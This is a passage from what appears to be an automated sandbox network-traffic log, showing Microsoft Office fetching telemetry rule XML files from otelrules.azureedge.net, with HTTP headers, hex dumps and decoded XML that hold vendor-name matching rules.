                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session IDSource IPSource PortDestination IPDestination Port
                                11192.168.2.54997413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:12 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 474
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                ETag: "0x8DC582B9964B277"
                                x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968kvnqxhC1EWRmf3g0000000sz000000000kk2e
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                12192.168.2.54997613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:12 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 471
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                ETag: "0x8DC582BB10C598B"
                                x-ms-request-id: 724e5c80-801e-007b-4caf-42e7ab000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f78459684bddphC1EWRbht40000001610000000002n2f
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                13192.168.2.54997713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:12 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 632
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB6E3779E"
                                x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968jrjrxhC1EWRmmrs00000016eg0000000012cx
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                Session IDSource IPSource PortDestination IPDestination Port
                                14192.168.2.54997813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:12 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 467
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                ETag: "0x8DC582BA6C038BC"
                                x-ms-request-id: c220f382-901e-0029-3552-43274a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968n2hr8hC1EWR9cag00000015ug00000000g167
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                15192.168.2.54998113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:14 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:14 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:14 GMT
                                Content-Type: text/xml
                                Content-Length: 407
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                ETag: "0x8DC582BBAD04B7B"
                                x-ms-request-id: 8778ab85-f01e-0071-75e9-41431c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165114Z-174f78459685726chC1EWRsnbg000000166g00000000mpwq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:14 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session IDSource IPSource PortDestination IPDestination Port
                                16192.168.2.54998513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:14 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 407
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                ETag: "0x8DC582B9698189B"
                                x-ms-request-id: 9f28f116-c01e-008d-51c7-432eec000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968frfdmhC1EWRxxbw00000016ag000000004rtb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session IDSource IPSource PortDestination IPDestination Port
                                17192.168.2.54998413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:14 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 486
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                ETag: "0x8DC582BB344914B"
                                x-ms-request-id: 6bbb397f-a01e-0002-2907-415074000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968pght8hC1EWRyvxg00000009d0000000006gf6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                18192.168.2.54998613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:14 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 486
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                ETag: "0x8DC582B9018290B"
                                x-ms-request-id: 1383167b-401e-008c-1f3c-4486c2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968qj8jrhC1EWRh41s000000163000000000r7w3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                19192.168.2.54998313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:14 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                ETag: "0x8DC582BA310DA18"
                                x-ms-request-id: c955d5f0-801e-00a0-7007-412196000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968pght8hC1EWRyvxg00000009bg00000000ccz1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session IDSource IPSource PortDestination IPDestination Port
                                20192.168.2.54998713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:16 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:16 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:16 GMT
                                Content-Type: text/xml
                                Content-Length: 469
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                ETag: "0x8DC582BBA701121"
                                x-ms-request-id: a11b7610-d01e-00ad-11d5-43e942000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165116Z-174f78459685726chC1EWRsnbg00000016a0000000007ecy
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:16 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                21192.168.2.54998813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:17 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                ETag: "0x8DC582BA41997E3"
                                x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968swgbqhC1EWRmnb4000000167g00000000v3hb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session IDSource IPSource PortDestination IPDestination Port
                                22192.168.2.54998913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:17 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 477
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                ETag: "0x8DC582BB8CEAC16"
                                x-ms-request-id: fb105ca9-d01e-002b-5b00-4425fb000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968glpgnhC1EWR7uec00000016b000000000htc0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
